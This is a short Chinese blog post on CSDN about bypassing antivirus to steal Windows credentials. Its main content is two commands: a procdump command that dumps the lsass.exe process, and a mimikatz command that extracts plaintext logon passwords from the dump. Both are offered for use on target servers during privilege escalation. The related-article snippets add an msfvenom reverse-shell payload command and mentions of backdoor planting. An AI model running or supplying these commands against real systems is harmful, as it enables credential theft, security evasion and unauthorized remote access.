Procdump+mimikatz绕过安全防护读取密码

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量362 收藏
点赞数
分类专栏: 杂七杂八
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/115388935
版权

目录

0x01 介绍

0x02 procdump介绍

0x03操作

0x01 介绍

在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。

0x02 procdump介绍

Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。
具体可以查看:https://docs.microsoft.com/en-us/sysinternals/downloads/procdump

0x03操作

使用procdump转储lsass进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

运行后将会保存lsass到本地,我们可以将该文件拖动到物理机中,使用mimikatz对其密码查看。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

最低0.47元/天 解锁文章
小韩韩啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4307
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 590
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
procdumpmimikatz联动
weixin_45715461的博客
06-30 691
procdumpmimikatz联动
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 2017
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6662
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法和NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash。
内网渗透-Mimikatz+Procdump的使用
weixin_60830484的博客
04-24 505
在内网渗透中,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
procdump+mimikatz.zip
11-14
《深入理解procdumpmimikatz:网络安全分析与防护》 在IT安全领域,了解并掌握一些关键工具的使用至关重要,其中procdumpmimikatz就是两个经常被提及的名字。这两个工具虽然各自有着不同的功能,但在网络安全...
procdump32_64+mimikatz.rar
06-15
标题中的"procdump32_64+mimikatz.rar"表明这是一个包含32位和64位版本的procdump工具与mimikatz工具的压缩包。这两个工具在IT安全领域中有着重要的作用,特别是对于系统调试和安全审计。 **procdump** Procdump是...
Procdump密码读取.zip
04-16
标签“密码提取”和“内存读取”进一步确认了Procdump是一个用于安全或取证目的的工具,它可以访问运行在计算机内存中的敏感信息。 Procdump是由微软 Sysinternals 出品的一个命令行实用程序,主要用于捕获进程的...
procdump配合密码获取
04-03
标题 "procdump配合密码获取" 暗示了我们讨论的主题是关于使用Procdump工具来捕获进程内存,并可能涉及到系统安全方面的问题。Procdump是Windows平台上的一个命令行工具,由Sysinternals开发,现在属于Microsoft。它...
工具ProcDump
03-21
ProcDump 是一个命令行工具,它允许开发者在特定条件触发时(如 CPU 占用过高、内存泄漏或特定异常)生成进程的内存转储文件。这使得开发者能够在出现问题时,即使程序已经崩溃,也能获取到关键的诊断信息。 2. **...
Mimikatz介绍
#7的博客
03-26 1549
本文主要介绍了mimikatz的定义、功能模块,并对常见的功能模块进行了详细的阐述。
内网渗透之某后渗透利用【网络安全
kali_Ma的博客
03-23 3311
主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码
使用Procdump+mimikatz抓取windows7明文密码
qq_40671478的博客
09-02 1475
首先打开mimikatz_trunk2.0 在DOS运行界面中输入privilege::debug提权命令1 我们提权成功后,我们再来输入sekurlsa::logonpasswords抓取密码命令 但是出现错误,如下图 网上搜索了一下,我决定使用procdump结合mimikatz实现免杀效果,procdump是微软的官方工具,不会被杀. 首先在任务管理器找到lsass.exe,右键创建转储文件 ...
mimikatz
m0_57056301的博客
02-11 2554
1.目的(win2008) 通过本地提权到system权限来使用mimikatz获取windows的账号及明文密码。 2.提权 本地提权 通过CVE-2020-0787上传程序实现提权 烂土豆提权 当已经拿下web权限时,上传MSF后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.45.17 port=6677 -f exe -o /root/6677.exe ...
mimikatz实战域渗透抓取域控管理员密码
热门推荐
404
02-07 1万+
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到shell之后必须是管理员的权限 步骤: **我这里攻击利用的msf里面的regsvr32_applocker_bypass_ser
关于本地提权的学习笔记(二):注入进程和利用漏洞提权
Mi1k7ea
02-26 3690
本文为学习笔记,很多不足之处望各位指导一下~ 注入进程提权: 该方式在实现提权的同时给系统安放了后门,以便于进行隐蔽的监听。 下载pinjector.exe程序: https://www.tarasco.org/security/Process_Injector/ 然后将该程序放入system32目录中,在命令行中输入pinjector,提示有-l和-p两个参数,先输入pinje
ProcDump教程:轻松实现C++(Qt)软件崩溃调试
"本资源主要介绍了如何使用ProcDump这一强大的命令行工具进行C++(Qt)软件的崩溃调试。ProcDump是由Microsoft Sysinternals开发的,适用于Windows系统的进程转储文件生成工具,同时也支持Linux环境。它简化了生成Dump...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值